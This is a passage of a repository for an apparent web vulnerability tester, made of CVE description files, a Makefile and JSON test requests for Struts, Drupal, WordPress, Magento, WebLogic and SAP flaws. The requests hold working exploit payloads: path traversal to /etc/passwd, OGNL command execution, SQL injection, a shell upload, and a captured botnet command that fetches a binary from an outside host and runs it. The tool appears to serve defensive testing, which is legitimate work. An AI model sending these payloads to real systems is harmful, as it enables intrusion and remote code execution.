2 | earlier, and Update 14 and earlier have an unrestricted file upload
3 | vulnerability. Successful exploitation could lead to arbitrary code execution.
--------------------------------------------------------------------------------
/tests/CVE-2018-7600/description.txt:
--------------------------------------------------------------------------------
1 | Drupal before 7.58, 8.x before 8.3.9, 8.4.x before 8.4.6, and 8.5.x before
2 | 8.5.1 allows remote attackers to execute arbitrary code because of an issue
3 | affecting multiple subsystems with default or common module configurations.
--------------------------------------------------------------------------------
/tests/CVE-2006-2743/description.txt:
--------------------------------------------------------------------------------
1 | Drupal 4.6.x before 4.6.7 and 4.7.0, when running on Apache with mod_mime, does
2 | not properly handle files with multiple extensions, which allows remote
3 | attackers to upload, modify, or execute arbitrary files in the files directory.
--------------------------------------------------------------------------------
/tests/CVE-2016-3081/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts 2.x before 2.3.20.2, 2.3.24.x before 2.3.24.2, and 2.3.28.x
2 | before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote
3 | attackers to execute arbitrary code via method: prefix, related to chained
4 | expressions.
--------------------------------------------------------------------------------
/tests/CVE-2014-3704/description.txt:
--------------------------------------------------------------------------------
1 | The expandArguments function in the database abstraction API in Drupal core
2 | 7.x before 7.32 does not properly construct prepared statements, which allows
3 | remote attackers to conduct SQL injection attacks via an array containing
4 | crafted keys.
--------------------------------------------------------------------------------
/tests/CVE-2014-6446/description.txt:
--------------------------------------------------------------------------------
1 | The Infusionsoft Gravity Forms plugin 1.5.3 through 1.5.10 for WordPress does
2 | not properly restrict access, which allows remote attackers to upload arbitrary
3 | files and execute arbitrary PHP code via a request to
4 | utilities/code_generator.php.
--------------------------------------------------------------------------------
/tests/CVE-2019-5418/description.txt:
--------------------------------------------------------------------------------
1 | There is a File Content Disclosure vulnerability in Action View (Rails)
2 | <5.2.2.1, <5.1.6.2, <5.0.7.2, <4.2.11.1 where specially crafted accept headers
3 | can cause contents of arbitrary files on the target system's filesystem to be
4 | exposed.
--------------------------------------------------------------------------------
/tests/CVE-2013-2248/description.txt:
--------------------------------------------------------------------------------
1 | Multiple open redirect vulnerabilities in Apache Struts 2.0.0 through 2.3.15
2 | allow remote attackers to redirect users to arbitrary web sites and conduct
3 | phishing attacks via a URL in a parameter using the (1) redirect: or (2)
4 | redirectAction: prefix.
--------------------------------------------------------------------------------
/tests/CVE-2016-10033/description.txt:
--------------------------------------------------------------------------------
1 | The mailSend function in the isMail transport in PHPMailer before 5.2.18
2 | might allow remote attackers to pass extra parameters to the mail command and
3 | consequently execute arbitrary code via a \" (backslash double quote) in a
4 | crafted Sender property.
--------------------------------------------------------------------------------
/tests/CVE-2012-0393/description.txt:
--------------------------------------------------------------------------------
1 | The ParameterInterceptor component in Apache Struts before 2.3.1.1 does not
2 | prevent access to public constructors, which allows remote attackers to create
3 | or overwrite arbitrary files via a crafted parameter that triggers the
4 | creation of a Java object.
--------------------------------------------------------------------------------
/tests/CVE-2018-20062/description.txt:
--------------------------------------------------------------------------------
1 | An issue was discovered in NoneCms V1.3. thinkphp/library/think/App.php allows
2 | remote attackers to execute arbitrary PHP code via crafted use of the filter
3 | parameter, as demonstrated by the
4 | s=index/\think\Request/input&filter=phpinfo&data=1 query string.
--------------------------------------------------------------------------------
/tests/CVE-2018-6389/description.txt:
--------------------------------------------------------------------------------
1 | In WordPress through 4.9.2, unauthenticated attackers can cause a denial of
2 | service (resource consumption) by using the large list of registered .js files
3 | (from wp-includes/script-loader.php) to construct a series of requests to load
4 | every file many times.
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/description.txt:
--------------------------------------------------------------------------------
1 | An unauthenticated user can execute SQL statements that allow arbitrary read
2 | access to the underlying database, which causes sensitive data leakage. This
3 | issue is fixed in Magento 2.1 prior to 2.1.18, Magento 2.2 prior to 2.2.9,
4 | Magento 2.3 prior to 2.3.2.
--------------------------------------------------------------------------------
/tests/CVE-2012-0392/description.txt:
--------------------------------------------------------------------------------
1 | The CookieInterceptor component in Apache Struts before 2.3.1.1 does not use
2 | the parameter-name whitelist, which allows remote attackers to execute
3 | arbitrary commands via a crafted HTTP Cookie header that triggers Java code
4 | execution through a static method.
--------------------------------------------------------------------------------
/tests/CVE-2018-7490/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/..%2f..%2f..%2f..%2f..%2fetc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://www.exploit-db.com/exploits/44223"
9 | }
10 | ]
--------------------------------------------------------------------------------
/tests/CVE-2016-3087/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts 2.3.20.x before 2.3.20.3, 2.3.24.x before 2.3.24.3, and 2.3.28.x
2 | before 2.3.28.1, when Dynamic Method Invocation is enabled, allow remote
3 | attackers to execute arbitrary code via vectors related to an ! (exclamation
4 | mark) operator to the REST Plugin.
--------------------------------------------------------------------------------
/tests/CVE-2017-9805/description.txt:
--------------------------------------------------------------------------------
1 | The REST Plugin in Apache Struts 2.1.2 through 2.3.x before 2.3.34 and 2.5.x
2 | before 2.5.13 uses an XStreamHandler with an instance of XStream for
3 | deserialization without any type filtering, which can lead to Remote Code
4 | Execution when deserializing XML payloads.
--------------------------------------------------------------------------------
/tests/CVE-2019-6341/description.txt:
--------------------------------------------------------------------------------
1 | In Drupal 7 versions prior to 7.65; Drupal 8.6 versions prior to 8.6.13;Drupal
2 | 8.5 versions prior to 8.5.14. Under certain circumstances the File
3 | module/subsystem allows a malicious user to upload a file that can trigger a
4 | cross-site scripting (XSS) vulnerability.
--------------------------------------------------------------------------------
/tests/CVE-2016-1182/description.txt:
--------------------------------------------------------------------------------
1 | ActionServlet.java in Apache Struts 1 1.x through 1.3.10 does not properly
2 | restrict the Validator configuration, which allows remote attackers to conduct
3 | cross-site scripting (XSS) attacks or cause a denial of service via crafted
4 | input, a related issue to CVE-2015-0899.
--------------------------------------------------------------------------------
/tests/CVE-2018-7422/description.txt:
--------------------------------------------------------------------------------
1 | A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1
2 | for WordPress allows remote attackers to retrieve arbitrary files via the
3 | ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php,
4 | aka absolute path traversal.
--------------------------------------------------------------------------------
/tests/CVE-2020-5902/description.txt:
--------------------------------------------------------------------------------
1 | In BIG-IP versions 15.0.0-15.1.0.3, 14.1.0-14.1.2.5, 13.1.0-13.1.3.3,
2 | 12.1.0-12.1.5.1, and 11.6.1-11.6.5.1, the Traffic Management User
3 | Interface (TMUI), also referred to as the Configuration utility, has a Remote
4 | Code Execution (RCE) vulnerability in undisclosed pages.
--------------------------------------------------------------------------------
/tests/CVE-2012-0391/description.txt:
--------------------------------------------------------------------------------
1 | The ExceptionDelegator component in Apache Struts before 2.2.3.1 interprets
2 | parameter values as OGNL expressions during certain exception handling for
3 | mismatched data types of properties, which allows remote attackers to
4 | execute arbitrary Java code via a crafted parameter.
--------------------------------------------------------------------------------
/tests/CVE-2012-0394/description.txt:
--------------------------------------------------------------------------------
1 | ** DISPUTED ** The DebuggingInterceptor component in Apache Struts before
2 | 2.3.1.1, when developer mode is used, allows remote attackers to execute
3 | arbitrary commands via unspecified vectors. NOTE: the vendor characterizes
4 | this behavior as not "a security vulnerability itself."
--------------------------------------------------------------------------------
/tests/CVE-2015-3337/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/_plugin/head/../../../../../../../../../etc/passwd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | },
8 | "Reference": "https://github.com/jas502n/CVE-2015-3337"
9 | }
10 | ]
11 |
--------------------------------------------------------------------------------
/tests/CVE-2016-1181/description.txt:
--------------------------------------------------------------------------------
1 | ActionServlet.java in Apache Struts 1 1.x through 1.3.10 mishandles
2 | multithreaded access to an ActionForm instance, which allows remote attackers
3 | to execute arbitrary code or cause a denial of service (unexpected memory
4 | access) via a multipart request, a related issue to CVE-2015-0899.
--------------------------------------------------------------------------------
/tests/CVE-2016-6195/description.txt:
--------------------------------------------------------------------------------
1 | SQL injection vulnerability in forumrunner/includes/moderation.php in
2 | vBulletin before 4.2.2 Patch Level 5 and 4.2.3 before Patch Level 1
3 | allows remote attackers to execute arbitrary SQL commands via the postids
4 | parameter to forumrunner/request.php, as exploited in the wild in July 2016.
--------------------------------------------------------------------------------
/tests/CVE-2019-11043/description.txt:
--------------------------------------------------------------------------------
1 | In PHP versions 7.1.x below 7.1.33, 7.2.x below 7.2.24 and 7.3.x below 7.3.11
2 | in certain configurations of FPM setup it is possible to cause FPM module to
3 | write past allocated buffers into the space reserved for FCGI protocol data,
4 | thus opening the possibility of remote code execution.
--------------------------------------------------------------------------------
/tests/CVE-2019-0192/description.txt:
--------------------------------------------------------------------------------
1 | In Apache Solr versions 5.0.0 to 5.5.5 and 6.0.0 to 6.6.5, the Config API
2 | allows to configure the JMX server via an HTTP POST request. By pointing
3 | it to a malicious RMI server, an attacker could take advantage of Solr's
4 | unsafe deserialization to trigger remote code execution on the Solr side.
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/description.txt:
--------------------------------------------------------------------------------
1 | The insufficient input path validation of certain parameter in the web service
2 | of SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31,
3 | 7.40, 7.50, allows an unauthenticated attacker to exploit a method to download
4 | zip files to a specific directory, leading to Path Traversal.
--------------------------------------------------------------------------------
/tests/CVE-2018-15961/test1.txt:
--------------------------------------------------------------------------------
1 | -----------------------------24464570528145
2 | Content-Disposition: form-data; name="file"; filename="shell"
3 | Content-Type: image/jpeg
4 |
5 | %%%%%%%%
6 | -----------------------------24464570528145
7 | Content-Disposition: form-data; name="path"
8 |
9 | shell
10 | -----------------------------24464570528145--
--------------------------------------------------------------------------------
/tests/CVE-2012-1007/description.txt:
--------------------------------------------------------------------------------
1 | Multiple cross-site scripting (XSS) vulnerabilities in Apache Struts 1.3.10
2 | allow remote attackers to inject arbitrary web script or HTML via (1) the name
3 | parameter to struts-examples/upload/upload-submit.do, or the message parameter
4 | to (2) struts-cookbook/processSimple.do or (3) struts-cookbook/processDyna.do
--------------------------------------------------------------------------------
/Makefile:
--------------------------------------------------------------------------------
1 | env:
2 | virtualenv -p python3 .env \
3 | && . .env/bin/activate \
4 | && pip install -r requirements.txt
5 |
6 | lint:
7 | . .env/bin/activate \
8 | && pylint webcve.py
9 |
10 | tests:
11 | python ./webcve.py --list group
12 | python ./webcve.py --list type
13 | python ./webcve.py -v --status-code 406 --url $(TEST_TARGET)
14 |
15 | clean:
16 | rm -rf .env
--------------------------------------------------------------------------------
/tests/CVE-2012-0393/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/Test.action?name=C:/sec-consult.txt&x[new+java.io.FileWriter(name)]=1",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://www.exploit-db.com/exploits/18329"
10 | }
11 | ]
12 |
--------------------------------------------------------------------------------
/tests/CVE-2017-9841/description.txt:
--------------------------------------------------------------------------------
1 | Util/PHP/eval-stdin.php in PHPUnit before 4.8.28 and 5.x before 5.6.3 allows
2 | remote attackers to execute arbitrary PHP code via HTTP POST data beginning
3 | with a "
2 |
3 |
4 |
5 | /../../../../../../../../../../../../../../../../../..test.txt
6 |
7 |
8 |
--------------------------------------------------------------------------------
/tests/CVE-2015-1397/description.txt:
--------------------------------------------------------------------------------
1 | SQL injection vulnerability in the getCsvFile function in the
2 | Mage_Adminhtml_Block_Widget_Grid class in Magento Community Edition (CE)
3 | 1.9.1.0 and Enterprise Edition (EE) 1.14.1.0 allows remote administrators to
4 | execute arbitrary SQL commands via the popularity[field_expr] parameter when
5 | the popularity[from] or popularity[to] parameter is set.
--------------------------------------------------------------------------------
/tests/CVE-2015-0899/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "action": "multi-submit-something",
11 | "page": "-1"
12 | }
13 | }
14 | ]
15 |
--------------------------------------------------------------------------------
/tests/CVE-2015-6568/description.txt:
--------------------------------------------------------------------------------
1 | Wolf CMS before 0.8.3.1 allows unrestricted file rename and PHP Code Execution
2 | because admin/plugin/file_manager/browse/ (aka the filemanager) does not
3 | prevent a change of a file extension to ".php" after originally using the
4 | parameter "filename" for uploading a JPEG image. Exploitation requires a
5 | registered user who has access to upload functionality.
--------------------------------------------------------------------------------
/tests/CVE-2017-17671/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/index.php?routestring=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\xampp\\apache\\logs\\access.log",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://ssd-disclosure.com/archives/3569"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2016-6896/description.txt:
--------------------------------------------------------------------------------
1 | Directory traversal vulnerability in the wp_ajax_update_plugin function in
2 | wp-admin/includes/ajax-actions.php in WordPress 4.5.3 allows remote
3 | authenticated users to cause a denial of service or read certain text files
4 | via a .. (dot dot) in the plugin parameter to wp-admin/admin-ajax.php, as
5 | demonstrated by /dev/random read operations that deplete the entropy pool.
--------------------------------------------------------------------------------
/tests/CVE-2007-5416/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/drupal/?_menu[callbacks][1][callback]=drupal_eval&_menu[items][][type]=-1&-312030023=1&q=1/?mimeType=text/html",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-17672/description.txt:
--------------------------------------------------------------------------------
1 | In vBulletin through 5.3.x, there is an unauthenticated deserialization
2 | vulnerability that leads to arbitrary file deletion and, under certain
3 | circumstances, code execution, because of unsafe usage of PHP's
4 | unserialize() in vB_Library_Template's cacheTemplates() function, which is a
5 | publicly exposed API. This is exploited with the templateidlist parameter
6 | to ajax/api/template/cacheTemplates.
--------------------------------------------------------------------------------
/tests/CVE-2019-7265/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/card_scan_decoder.php?No=30&door=%60wget http://switchnets.net/hoho.arm7; chmod 777 hoho.arm7; ./hoho.arm7 linear%60",
5 | "Headers": {
6 | "User-Agent": "dark_NeXus_Qbot/4.0 (compatible; MSIE5.01; minerword NT)",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://honeydb.io"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-8394/test1.txt:
--------------------------------------------------------------------------------
1 | ------aaa
2 | Content-Disposition: form-data; name="sspsetup"
3 |
4 | Attach
5 | ------aaa
6 | Content-Disposition: form-data; name="module"
7 |
8 | CustomLogin
9 | ------aaa
10 | Content-Disposition: form-data; name="filePath"; filename="test.jsp"
11 | Content-Type: text/html
12 |
13 | This is shell content
14 | ------aaa
15 | Content-Disposition: form-data; name="hmtlcontent"
16 |
17 |
18 | ------aaa--
--------------------------------------------------------------------------------
/tests/CVE-2016-4010/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/rest/V1/guest-carts/1234/set-payment-information",
5 | "Headers": {
6 | "Content-Type": "application/json",
7 | "User-Agent": "Mozilla/5.0",
8 | "Connection": "close"
9 | },
10 | "Data-File": "test1.txt",
11 | "Reference": "https://www.exploit-db.com/exploits/39838"
12 | }
13 | ]
14 |
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/CTCWebService/Config1?wsd",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6286 PoC",
7 | "Content-Type": "application/xml",
8 | "Connection": "close"
9 | },
10 | "Reference": "https://github.com/chipik/SAP_RECON/"
11 | }
12 | ]
--------------------------------------------------------------------------------
/tests/CVE-2012-0392/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/Test.action",
5 | "Headers": {
6 | "Cookie": "(#_memberAccess[\"allowStaticMethodAccess\"]\u003dtrue)(x)=1; x[@java.lang.Runtime@getRuntime().exec('calc')]=1",
7 | "User-Agent": "Mozilla/5.0",
8 | "Connection": "close"
9 | },
10 | "Reference": "https://www.exploit-db.com/exploits/18329"
11 | }
12 | ]
13 |
--------------------------------------------------------------------------------
/tests/CVE-2017-5638/description.txt:
--------------------------------------------------------------------------------
1 | The Jakarta Multipart parser in Apache Struts 2 2.3.x before 2.3.32 and 2.5.x
2 | before 2.5.10.1 has incorrect exception handling and error-message generation
3 | during file-upload attempts, which allows remote attackers to execute arbitrary
4 | commands via a crafted Content-Type, Content-Disposition, or Content-Length
5 | HTTP header, as exploited in the wild in March 2017 with a Content-Type header
6 | containing a #cmd= string
--------------------------------------------------------------------------------
/tests/CVE-2018-7602/description.txt:
--------------------------------------------------------------------------------
1 | A remote code execution vulnerability exists within multiple subsystems of
2 | Drupal 7.x and 8.x. This potentially allows attackers to exploit multiple
3 | attack vectors on a Drupal site, which could result in the site being
4 | compromised. This vulnerability is related to Drupal core - Highly critical -
5 | Remote Code Execution - SA-CORE-2018-002. Both SA-CORE-2018-002 and this
6 | vulnerability are being exploited in the wild.
--------------------------------------------------------------------------------
/tests/CVE-2019-7139/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/?type_id=recently_products&ids[0][added_at]=&ids[0][product_id][from]=0&ids[0][product_id][to]=))) OR (SELECT 1 UNION SELECT 2 FROM DUAL WHERE 1=1) -- -",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close"
8 | },
9 | "Reference": "https://snyk.io/vuln/SNYK-PHP-MAGENTOCORE-174031"
10 | }
11 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-11580/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/crowd/admin/uploadplugin.action",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "multipart/mixed",
8 | "Connection": "close"
9 | },
10 | "Data": {
11 | "file_cdl": "@rce.jar"
12 | },
13 | "Reference": "https://www.corben.io/atlassian-crowd-rce/"
14 | }
15 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-14882/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server product of Oracle Fusion Middleware
2 | (component: Console). Supported versions that are affected are 10.3.6.0.0,
3 | 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Easily exploitable
4 | vulnerability allows unauthenticated attacker with network access via HTTP to
5 | compromise Oracle WebLogic Server. Successful attacks of this vulnerability can
6 | result in takeover of Oracle WebLogic Server.
--------------------------------------------------------------------------------
/tests/CVE-2014-0114/description.txt:
--------------------------------------------------------------------------------
1 | Apache Commons BeanUtils, as distributed in lib/commons-beanutils-1.8.0.jar in
2 | Apache Struts 1.x through 1.3.10 and in other products requiring
3 | commons-beanutils through 1.9.2, does not suppress the class property, which
4 | allows remote attackers to "manipulate" the ClassLoader and execute arbitrary
5 | code via the class parameter, as demonstrated by the passing of this parameter
6 | to the getClass method of the ActionForm object in Struts 1.
--------------------------------------------------------------------------------
/tests/CVE-2020-6287/description.txt:
--------------------------------------------------------------------------------
1 | SAP NetWeaver AS JAVA (LM Configuration Wizard), versions - 7.30, 7.31, 7.40,
2 | 7.50, does not perform an authentication check which allows an attacker without
3 | prior authentication to execute configuration tasks to perform critical actions
4 | against the SAP Java system, including the ability to create an administrative
5 | user, and therefore compromising Confidentiality, Integrity and Availability of
6 | the system, leading to Missing Authentication Check.
--------------------------------------------------------------------------------
/tests/CVE-2014-6446/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/wp-content/plugins/infusionsoft/Infusionsoft/utilities/code_generator.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "fileNamePattern": "some-thing.php",
11 | "fileTemplate": ""
12 | }
13 | }
14 | ]
15 |
--------------------------------------------------------------------------------
/tests/CVE-2018-1000130/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/jolokia/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Connection": "close",
8 | "Content-Type": "application/x-www-form-urlencoded",
9 | "Content-Length": "206"
10 | },
11 | "Data-File": "test1.txt",
12 | "Reference": "https://blog.gdssecurity.com/labs/2018/4/18/jolokia-vulnerabilities-rce-xss.html"
13 | }
14 | ]
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/struts2-rest-showcase/orders/6",
5 | "Headers": {
6 | "Content-Type": "application/xml",
7 | "Content-Length": "3334",
8 | "charset": "UTF-8",
9 | "User-Agent": "Mozilla/5.0",
10 | "Connection": "close"
11 | },
12 | "Data-File": "test1.xml",
13 | "Reference": "https://github.com/iBearcat/S2-056-XStream"
14 | }
15 | ]
--------------------------------------------------------------------------------
/tests/CVE-2020-6286/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/CTCWebService/CTCWebServiceBean",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0 CVE-2020-6286 PoC",
7 | "Content-Type": "text/xml;charset=UTF-8",
8 | "Connection": "close"
9 | },
10 | "Data-File": "test1.txt",
11 | "Reference": "https://github.com/chipik/SAP_RECON/"
12 | }
13 | ]
--------------------------------------------------------------------------------
/tests/CVE-2015-1399/description.txt:
--------------------------------------------------------------------------------
1 | PHP remote file inclusion vulnerability in the fetchView function in the
2 | Mage_Core_Block_Template_Zend class in Magento Community Edition (CE) 1.9.1.0
3 | and Enterprise Edition (EE) 1.14.1.0 allows remote administrators to execute
4 | arbitrary PHP code via a URL in unspecified vectors involving the setScriptPath
5 | function. NOTE: it is not clear whether this issue crosses privilege boundaries,
6 | since administrators might already have privileges to include arbitrary files.
--------------------------------------------------------------------------------
/tests/CVE-2018-11776/description.txt:
--------------------------------------------------------------------------------
1 | Apache Struts versions 2.3 to 2.3.34 and 2.5 to 2.5.16 suffer from possible
2 | Remote Code Execution when alwaysSelectFullNamespace is true (either by user or
3 | a plugin like Convention Plugin) and then: results are used with no namespace
4 | and in same time, its upper package have no or wildcard namespace and similar
5 | to results, same possibility when using url tag which doesn't have value and
6 | action set and in same time, its upper package have no or wildcard namespace.
--------------------------------------------------------------------------------
/tests/CVE-2018-1327/description.txt:
--------------------------------------------------------------------------------
1 | The Apache Struts REST Plugin is using XStream library which is vulnerable and
2 | allow perform a DoS attack when using a malicious request with specially
3 | crafted XML payload. Upgrade to the Apache Struts version 2.5.16 and switch to
4 | an optional Jackson XML handler as described here
5 | http://struts.apache.org/plugins/rest/#custom-contenttypehandlers. Another
6 | option is to implement a custom XML handler based on the Jackson XML handler
7 | from the Apache Struts 2.5.16.
--------------------------------------------------------------------------------
/tests/CVE-2013-2248/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/struts2-showcase/fileupload/upload.action?redirect:http://www.yahoo.com/",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | },
9 | {
10 | "Method": "GET",
11 | "URI": "/struts2-showcase/modelDriven/modelDriven.action?redirectAction:http://www.google.com/%23",
12 | "Headers": {
13 | "User-Agent": "Mozilla/5.0"
14 | }
15 | }
16 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-3396/description.txt:
--------------------------------------------------------------------------------
1 | The Widget Connector macro in Atlassian Confluence Server before version 6.6.12
2 | (the fixed version for 6.6.x), from version 6.7.0 before 6.12.3 (the fixed
3 | version for 6.12.x), from version 6.13.0 before 6.13.3 (the fixed version for
4 | 6.13.x), and from version 6.14.0 before 6.14.2 (the fixed version for 6.14.x),
5 | allows remote attackers to achieve path traversal and remote code execution on
6 | a Confluence Server or Data Center instance via server-side template injection.
--------------------------------------------------------------------------------
/tests/CVE-2019-2729/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/wls-wsat/CoordinatorPortType",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0",
7 | "Content-Type": "text/xml",
8 | "SOAPAction": "",
9 | "lfcmd": "msfcmd.read()"
10 | },
11 | "Data-File": "test1.txt",
12 | "Reference": "https://github.com/waffl3ss/CVE-2019-2729"
13 | }
14 | ]
--------------------------------------------------------------------------------
/tests/CVE-2019-6703/description.txt:
--------------------------------------------------------------------------------
1 | Incorrect access control in migla_ajax_functions.php in the Calmar Webmedia
2 | Total Donations plugin through 2.0.5 for WordPress allows unauthenticated
3 | attackers to update arbitrary WordPress option values, leading to site
4 | takeover. These attackers can send requests to wp-admin/admin-ajax.php to call
5 | the miglaA_update_me action to change arbitrary options on affected sites.
6 | This can be used to enable new user registration and set the default role for
7 | new users to Administrator.
--------------------------------------------------------------------------------
/tests/CVE-2016-6896/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/wp-admin/admin-ajax.php",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded"
8 | },
9 | "Data": {
10 | "plugin": "../../../../../../../../../../dev/random",
11 | "action": "update-plugin"
12 | },
13 | "Reference": "https://github.com/tbhaxor/web-exploits/blob/master/cve-2016/6896.py"
14 | }
15 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-17671/description.txt:
--------------------------------------------------------------------------------
1 | vBulletin through 5.3.x on Windows allows remote PHP code execution because a
2 | require_once call is reachable with an unauthenticated request that can
3 | include directory traversal sequences to specify an arbitrary pathname, and
4 | because ../ traversal is blocked but ..\ traversal is not blocked. For example,
5 | an attacker can make an invalid HTTP request containing PHP code, and then make
6 | an index.php?routestring= request with enough instances of ".." to reach an
7 | Apache HTTP Server log file.
--------------------------------------------------------------------------------
/tests/CVE-2013-1966/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/?a=1${(%23_memberAccess[\"allowStaticMethodAccess\"]=true,%23a=@java.lang.Runtime@getRuntime().exec('netstat -an').getInputStream(),%23b=new+java.io.InputStreamReader(%23a),%23c=new+java.io.BufferedReader(%23b),%23d=new+char[50000],%23c.read(%23d),%23sbtest=@org.apache.struts2.ServletActionContext@getResponse().getWriter(),%23sbtest.println(%23d),%23sbtest.close())}",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | }
9 | ]
--------------------------------------------------------------------------------
/tests/CVE-2015-1399/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "POST",
4 | "URI": "/index.php/admin/Cms_Wysiwyg/directive",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0",
7 | "Content-Type": "application/x-www-form-urlencoded",
8 | "Content-Length": "139"
9 | },
10 | "Data": {
11 | "forwarded": "1",
12 | "___directive": "%7B%7Bblock%20output%3DfetchView%20type%3DCore%2FTemplate%20ScriptPath%3Dphar%3A%2F%2Fmedia%2Fexported.file%7D%7D"
13 | }
14 | }
15 | ]
16 |
--------------------------------------------------------------------------------
/tests/CVE-2016-3087/test.json:
--------------------------------------------------------------------------------
1 | [
2 | {
3 | "Method": "GET",
4 | "URI": "/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an",
5 | "Headers": {
6 | "User-Agent": "Mozilla/5.0"
7 | }
8 | }
9 | ]
--------------------------------------------------------------------------------
/tests/CVE-2017-10271/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: WLS Security). Supported versions that are affected
3 | are 10.3.6.0.0, 12.1.3.0.0, 12.2.1.1.0 and 12.2.1.2.0. Easily exploitable
4 | vulnerability allows unauthenticated attacker with network access via T3 to
5 | compromise Oracle WebLogic Server. Successful attacks of this vulnerability can
6 | result in takeover of Oracle WebLogic Server. CVSS 3.0 Base Score 7.5
7 | (Availability impacts). CVSS Vector:
8 | (CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H).
--------------------------------------------------------------------------------
/tests/CVE-2019-2725/description.txt:
--------------------------------------------------------------------------------
1 | Vulnerability in the Oracle WebLogic Server component of Oracle Fusion
2 | Middleware (subcomponent: Web Services). Supported versions that are affected
